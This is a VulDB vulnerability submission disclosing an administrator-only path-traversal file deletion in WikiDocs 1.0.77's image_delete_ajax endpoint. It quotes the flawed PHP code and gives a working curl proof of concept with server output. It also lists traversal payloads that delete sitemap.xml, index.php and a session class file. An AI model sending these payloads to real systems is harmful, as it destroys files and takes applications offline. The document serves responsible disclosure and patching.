Submit #609096: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversalinfo

Titel	Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal
Beschreibung	The image_delete_ajax() endpoint in submit.php improperly concatenates user‐supplied filenames to its document directory without sanitization or canonicalization, allowing an authenticated administrator to delete any file on disk that the web server user can write, via a simple path‐traversal payload. Affected Component File: submit.php?act=image_delete_ajax Function: image_delete_ajax() Authentication: Requires session authentication level 2 (administrator) Technical Details $document = $_POST['document']; $image_filename = $_POST['image_name']; ... $DOC = new Document($document); if(!is_dir($DOC->DIR)){ mkdir($DOC->DIR,0755,true); } $filename = $DOC->DIR . $image_filename; if (file_exists($filename)) { $image_deleted = unlink($filename); } An admin can supply image_name=../../sensitive.php (or any file) and have it deleted. Proof of Concept (PoC): ┌──(root㉿kali)-[/home/kali] └─# curl http://127.0.0.1/sitemap.xml <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://127.0.0.1/</loc> <lastmod>1970-01-01T00:00:00+00:00</lastmod> </url> <url> <loc>http://127.0.0.1/opt</loc> <lastmod>1970-01-01T00:00:00+00:00</lastmod> </url> </urlset> ┌──(root㉿kali)-[/home/kali] └─# curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1' -H $'Content-Length: 38' -H $'Cache-Control: max-age=0' -H $'sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"' -H $'sec-ch-ua-mobile: ?0' -H $'sec-ch-ua-platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Origin: http://127.0.0.1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Referer: http://127.0.0.1/apidocs/com/sap/engine/deploy/manager/scripts/initializations.js?auth' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \ -b $'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \ --data-binary $'document=&image_name=../../sitemap.xml' \ $'http://127.0.0.1/submit.php?act=image_delete_ajax' HTTP/1.1 200 OK Date: Fri, 04 Jul 2025 08:15:44 GMT Server: Apache/2.4.62 (Unix) X-Powered-By: PHP/8.3.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 120 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"} ┌──(root㉿kali)-[/home/kali] └─# curl http://127.0.0.1/sitemap.xml <!DOCTYPE html> <html lang="en"> <head> ... 404 page ... Delete application code (DoS): document=&image_name=../../index.php document=&image_name=../../classes/Session.class.php CVSS v3.1 Assessment Attack Vector (AV): Network Attack Complexity (AC): Low Privileges Required (PR): High (administrator session) User Interaction (UI): None Scope (S): Unchanged Confidentiality (C): None Integrity (I): Low/High (arbitrary file deletion) Availability (A): High (application DoS) If "Integrity Low" is assumed (i.e. only non‐critical files), the score would be 5.5; however the ability to delete may source files could justify I:H. Application Setup: docker run -d -p 80:80 zavy86/wikidocs References: https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh Credits Discovered by Matan Sandori
Benutzer	MatanS (UID 86894)
Einreichung	04.07.2025 10:38 (vor 12 Monaten)
Moderieren	13.07.2025 09:28 (9 days later)
Status	Akzeptiert
VulDB Eintrag	316273 [Zavy86 WikiDocs bis 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax Directory Traversal]
Punkte	17

◂ Zurück Übersicht Weiter ▸

Do you know our Splunk app?

Download it now for free!